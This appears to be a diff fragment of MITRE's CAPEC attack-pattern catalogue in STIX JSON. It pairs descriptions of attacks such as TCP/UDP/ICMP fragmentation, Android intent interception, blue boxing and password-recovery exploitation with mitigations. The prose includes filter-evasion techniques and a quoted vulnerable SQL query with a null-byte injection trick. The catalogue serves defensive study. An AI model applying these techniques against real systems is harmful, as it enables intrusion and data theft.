"x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to know the endpoint of the web service, and be able to reach the endpoint with a malicious SOAP message." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enforce strict schema validation. The schema should enforce a maximum number of array elements. If the number of maximum array elements can't be limited another validation method should be used. One such method could be comparing the declared number of items in the array with the existing number of elements of the array. If these numbers don't match drop the SOAP packet at the web service layer.", + "id": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "modified": "2019-09-30T00:00:00.000Z", + "name": "coa-493-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d8f6f476-720d-4647-8211-640732114f60", + "modified": "2019-09-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0878f5f1-911e-488a-8d4e-1f242b96933f", + "target_ref": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a TCP Fragmentation attack against a target with the intention of avoiding filtering rules of network controls, by attempting to fragment the TCP packet such that the headers flag field is pushed into the second fragment which typically is not filtered.", + "external_references": [ + { + "external_id": "CAPEC-494", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Security Considerations - IP Fragment Filtering", + "external_id": "REF-423", + "source_name": "reference_from_CAPEC", + "url": "https://www.rfc-editor.org/rfc/rfc1858.txt" + } + ], + "id": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "TCP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In comparison, IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. This behavior of fragmentation defeats some IPS and firewall filters who typically check the FLAGS in the header of the first packet since dropping this packet prevents the following fragments from being processed and assembled.\n Another variation is overlapping fragments thus that an innocuous first segment passes the filter and the second segment overwrites the TCP header data with the true payload which is malicious in nature. The malicious payload manipulated properly may lead to a DoS due to resource consumption or kernel crash. Additionally the fragmentation could be used in conjunction with sending fragments at a rate slightly slower than the timeout to cause a DoS condition by forcing resources that assemble the packet to wait an inordinate amount of time to complete the task. The fragmentation identification numbers could also be duplicated very easily as there are only 16 bits in IPv4 so only 65536 packets are needed.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the adversary needs to ability to send TCP packets of arbitrary size with crafted data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by enforcing rules at the router following the guidance of RFC1858. The essential part of the guidance is creating the following rule \"IF FO=1 and PROTOCOL=TCP then DROP PACKET\" as this mitigated both tiny fragment and overlapping fragment attacks in IPv4. In IPv6 overlapping(RFC5722) additional steps may be required such as deep packet inspection. The delayed fragments may be mitigated by enforcing a timeout on the transmission to receive all packets by a certain time since the first packet is received. According to RFC2460 IPv6 implementations should enforce a rule to discard all fragments if the fragments are not ALL received within 60 seconds of the FIRST arriving fragment.", + "id": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-494-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4c63b7b2-466c-4c0a-9b40-4dc3b26ad502", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8d367dc3-d87f-4810-8600-406d591143ad", + "target_ref": "attack-pattern--753614f7-f574-4a2f-9cc4-481c62c25c32", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a UDP Fragmentation attack against a target server in an attempt to consume resources such as bandwidth and CPU. IP fragmentation occurs when an IP datagram is larger than the MTU of the route the datagram has to traverse. Typically the attacker will use large UDP packets over 1500 bytes of data which forces fragmentation as ethernet MTU is 1500 bytes. This attack is a variation on a typical UDP flood but it enables more network bandwidth to be consumed with fewer packets. Additionally it has the potential to consume server CPU resources and fill memory buffers associated with the processing and reassembling of fragmented packets.", + "external_references": [ + { + "external_id": "CAPEC-495", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/495.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "Yossi Gilad, Amir Herzberg, Fragmentation Considered Vulnerable, 2012", + "external_id": "REF-424", + "source_name": "reference_from_CAPEC", + "url": "http://u.cs.biu.ac.il/~herzbea/security/12-03%20fragmentation.pdf" + } + ], + "id": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "modified": "2019-04-04T00:00:00.000Z", + "name": "UDP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the attacker to be able to generate fragmented IP traffic containing crafted data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated by changing default cache sizes to be larger at the OS level. Additionally rules can be enforced to prune the cache with shorter timeouts for packet reassembly as the cache nears capacity.", + "id": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-495-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9a8d2ca3-6686-47c3-ba2b-0bd391ee4af9", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--30d838cf-1c32-4edd-b3aa-796095ba5314", + "target_ref": "attack-pattern--428d5dc6-c2be-4a2a-aed1-1e794518b101", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may execute a ICMP Fragmentation attack against a target with the intention of consuming resources or causing a crash. The attacker crafts a large number of identical fragmented IP packets containing a portion of a fragmented ICMP message. The attacker these sends these messages to a target host which causes the host to become non-responsive. Another vector may be sending a fragmented ICMP message to a target host with incorrect sizes in the header which causes the host to hang.", + "external_references": [ + { + "external_id": "CAPEC-496", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/496.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "external_id": "CWE-404", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/404.html" + }, + { + "description": "ICMP Attacks Illustrated", + "external_id": "REF-425", + "source_name": "reference_from_CAPEC", + "url": "http://www.sans.org/reading-room/whitepapers/threats/icmp-attacks-illustrated-477?show=icmp-attacks-illustrated-477&cat=threats" + } + ], + "id": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "modified": "2019-04-04T00:00:00.000Z", + "name": "ICMP Fragmentation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the target system to be running a vulnerable implementation of IP, and the attacker needs to ability to send arbitrary sized ICMP packets to the target." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack may be mitigated through egress filtering based on ICMP payload so a network is a \"good neighbor\" to other networks. Bad IP implementations become patched, so using the proper version of a browser or OS is recommended.", + "id": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "modified": "2019-04-04T00:00:00.000Z", + "name": "coa-496-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b4385941-4381-4b52-8fff-1a5170cad3da", + "modified": "2019-04-04T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f1132180-9c58-4be8-8ef6-dedb17aed57e", + "target_ref": "attack-pattern--fbdcbfab-769d-4d52-8ec2-7fd1e4c212de", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in probing and exploration activities to determine if common key files exists. Such files often contain configuration and security parameters of the targeted application, system or network. Using this knowledge may often pave the way for more damaging attacks.", + "external_references": [ + { + "external_id": "CAPEC-497", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/497.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "File and Directory Discovery", + "external_id": "T1083", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1083" + } + ], + "id": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "modified": "2020-12-17T00:00:00.000Z", + "name": "File Discovery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--bddd2549-167f-4f7b-8d0f-6d1e647b26f6" + ], + "x_capec_prerequisites": [ + "The adversary must know the location of these common key files." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very Low", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage file protection mechanisms to render these files accessible only to authorized parties.", + "id": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "modified": "2020-12-17T00:00:00.000Z", + "name": "coa-497-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2019-09-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--47804bd8-6b7f-435e-b2e4-277a8a51384e", + "modified": "2020-12-17T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--54c4cc5a-fe59-4f27-82bc-a2e6d27d80b7", + "target_ref": "attack-pattern--323ed142-7793-413d-838f-72626caf58da", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary examines screenshot images created by iOS in an attempt to obtain sensitive information. This attack targets temporary screenshots created by the underlying OS while the application remains open in the background.", + "external_references": [ + { + "external_id": "CAPEC-498", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/498.html" + }, + { + "external_id": "CWE-359", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/359.html" + }, + { + "description": "Jonathan Zdziarksi, Hacking and Securing iOS Applications (First Edition), 2012, O'Reilly Media, Inc.", + "external_id": "REF-426", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Probe iOS Screenshots", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "These images are used by iOS to aid in the visual transition between open applications and improve the user's experience with a device. An application can be at risk even if it properly protects sensitive information when at rest. If the application displays sensitive information on the screen, then the potential exists for iOS to unintentionally record that information in an image file. An adversary can retrieve these images either by gaining access to the image files, or by physically obtaining the device and leveraging the multitasking switcher interface. This attack differs from CAPEC-648, which targets intentional screenshots initiated by an end-user that are stored in the device's storage.", + "x_capec_prerequisites": [ + "This type of an attack requires physical access to a device to either excavate the image files (potentially by leveraging a Jailbreak) or view the screenshots through the multitasking switcher (by double tapping the home button on the device)." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an application that may display sensitive information should clear the screen contents before a screenshot is taken. This can be accomplished by setting the key window's hidden property to YES. This code to hide the contents should be placed in both the applicationWillResignActive() and applicationDidEnterBackground() methods.", + "id": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-498-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04be062d-d511-410f-99c9-f9f7993a39af", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bf6e6d14-40c1-4f5f-9acd-1ad186a51940", + "target_ref": "attack-pattern--1b75b059-c9ee-4c4d-b016-bafb20cce96b", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, through a previously installed malicious application, intercepts messages from a trusted Android-based application in an attempt to achieve a variety of different objectives including denial of service, information disclosure, and data injection. An implicit intent sent from a trusted application can be received by any application that has declared an appropriate intent filter. If the intent is not protected by a permission that the malicious application lacks, then the attacker can gain access to the data contained within the intent. Further, the intent can be either blocked from reaching the intended destination, or modified and potentially forwarded along.", + "external_references": [ + { + "external_id": "CAPEC-499", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/499.html" + }, + { + "external_id": "CWE-925", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/925.html" + }, + { + "description": "Erika Chin, Adrienne Porter Felt, Kate Greenwood, David Wagner, Analyzing Inter-Application Communication in Android, 2011, International Conference on Mobile Systems, Applications, and Services (MobiSys)", + "external_id": "REF-427", + "source_name": "reference_from_CAPEC", + "url": "https://people.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf" + } + ], + "id": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Android Intent Intercept", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--bdc2219a-ebe0-4372-90b8-841dd7bd4c8e" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find an android application that uses implicit intents: Since this attack only works on android applications that use implicit intents, rather than explicit intents, an adversary must first identify an app that uses implicit intents. They must also determine what the contents of the intents being sent are such that a malicious application can get sent these intents.

Experiment

  1. Create a malicious app: The adversary must create a malicious android app meant to intercept implicit intents from a target application

    2. Techniques
    Specify the type of intent wished to be intercepted in the malicious app's manifest file using an intent filter

  2. Get user to download malicious app: The adversary must get a user using the targeted app to download the malicious app by any means necessary

Exploit

  1. Intercept Implicit Intents: Once the malicious app is downloaded, the android device will forward any implicit intents from the target application to the malicious application, allowing the adversary to gaina access to the contents of the intent. The adversary can proceed with any attack using the contents of the intent.

    2. Techniques
    Block the intent from reaching the desired location, causing a denial of service
    Gather sensitive information from the intercepted intent
    Modify the contents of the intent and forward along to another application
", + "x_capec_parent_of_refs": [ + "attack-pattern--10ce28bf-9f93-4a45-a39e-6407141a34d4" + ], + "x_capec_prerequisites": [ + "An adversary must be able install a purpose built malicious application onto the Android device and convince the user to execute it. The malicious application is used to intercept implicit intents." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, explicit intents should be used whenever sensitive data is being sent. An explicit intent is delivered to a specific application as declared within the intent, whereas the Android operating system determines who receives an implicit intent which could potentially be a malicious application. If an implicit intent must be used, then it should be assumed that the intent will be received by an unknown application and any response should be treated accordingly. Implicit intents should never be used for inter-application communication.", + "id": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-499-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ede8d88a-2bc4-4188-a9d7-2dbbe7c96fb5", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0c769b9e-b3fa-410a-b87b-ef79448b95b2", + "target_ref": "attack-pattern--48f21dcd-2490-49c6-9690-1cb586b201f4", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.\n \n This attack pattern is included in CAPEC for historical purposes.\n \n ", + "external_references": [ + { + "external_id": "CAPEC-5", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/5.html" + }, + { + "external_id": "CWE-285", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Blue Boxing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "An adversary identifies a vulnerable CCITT-5 phone line, and sends a combination tone to the switch in order to request administrative access. Based on tone and timing parameters the request is verified for access to the switch. Once the adversary has gained control of the switch launching calls, routing calls, and a whole host of opportunities are available." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "System must use weak authentication mechanisms for administrative functions." + ], + "x_capec_resources_required": [ + "CCITT-5 or other vulnerable lines, with the ability to send tones such as combined 2,400 Hz and 2,600 Hz tones to the switch" + ], + "x_capec_skills_required": { + "Low": "Given a vulnerable phone system, the attackers' technical vector relies on attacks that are well documented in cracker 'zines and have been around for decades." + }, + "x_capec_status": "Obsolete", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Upgrade phone lines. Note this may be prohibitively expensive", + "id": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--49c94014-b8f3-4700-b509-8b705cbfbb0c", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ad48d35a-8497-454e-a5b3-7ce3c8b75663", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use strong access control such as two factor access control for administrative access to the switch", + "id": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-5-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--9246fa28-1064-427d-b782-252991eab85a", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3a64abb3-73d9-4d4b-b7d8-afda18b016a0", + "target_ref": "attack-pattern--7b462c1f-e0bf-41a7-b811-2b676c103bda", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may take advantage of the application feature to help users recover their forgotten passwords in order to gain access into the system with the same privileges as the original user. Generally password recovery schemes tend to be weak and insecure.", + "external_references": [ + { + "external_id": "CAPEC-50", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/50.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-640", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/640.html" + }, + { + "description": "Advisory: Unauthorized password recovery in phpBannerExchange, 2006, RedTeam Pentesting GmbH", + "external_id": "REF-429", + "source_name": "reference_from_CAPEC", + "url": "http://www.redteam-pentesting.de/advisories/rt-sa-2006-005.txt" + } + ], + "id": "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Password Recovery Exploitation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker clicks on the \"forgot password\" and is presented with a single security question. The question is regarding the name of the first dog of the user. The system does not limit the number of attempts to provide the dog's name. An attacker goes through a list of 100 most popular dog names and finds the right name, thus getting the ability to reset the password and access the system.", + "\n phpBanner Exchange is a PHP script (using the mySQL database) that facilitates the running of a banner exchange without extensive knowledge of PHP or mySQL.\n A SQL injection was discovered in the password recovery module of the system that allows recovering an arbitrary user's password and taking over their account. The problem is due to faulty input sanitization in the phpBannerExchange, specifically the e-mail address of the user which is requested by the password recovery module.\n The e-mail address requested by the password recovery module on the resetpw.php page. That e-mail address is validated with the following regular expression:\n if(!eregi(\"^[_a-z0-9-]+(\\.[_a-z0-9-]+)*@[a-z0-9-]+(\\.[a-z0-9-]+)*(\\.[a-z]{2,3})$\", $email)){\n \n A bug in the implementation of eregi() allows to pass additional character using a null byte \"\\0\". Since eregi() is implemented in C, the variable $email is treated as a zero-terminated string. All characters following the Null Byte will not be recognized by the regular expression. So an e-mail address can be provided that includes the special character \" ' \" to break the SQL query below (and it will not be rejected by the regular expression because of the null byte trick). So a SQL injection becomes possible:\n $get_info=mysql_query(\"select * from banneruser whereemail='$email' \");\n \n This query will return a non-zero result set even though the email supplied (attacker's email) is not in the database.\n Then a new password for the user is generated and sent to the $email address, an e-mail address controlled by the attacker. An attacker can then log in into the system.See also: CVE-2006-3013" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Understand the password recovery mechanism and how it works.

Exploit

  1. Find a weakness in the password recovery mechanism and exploit it. For instance, a weakness may be that a standard single security question is used with an easy to determine answer.

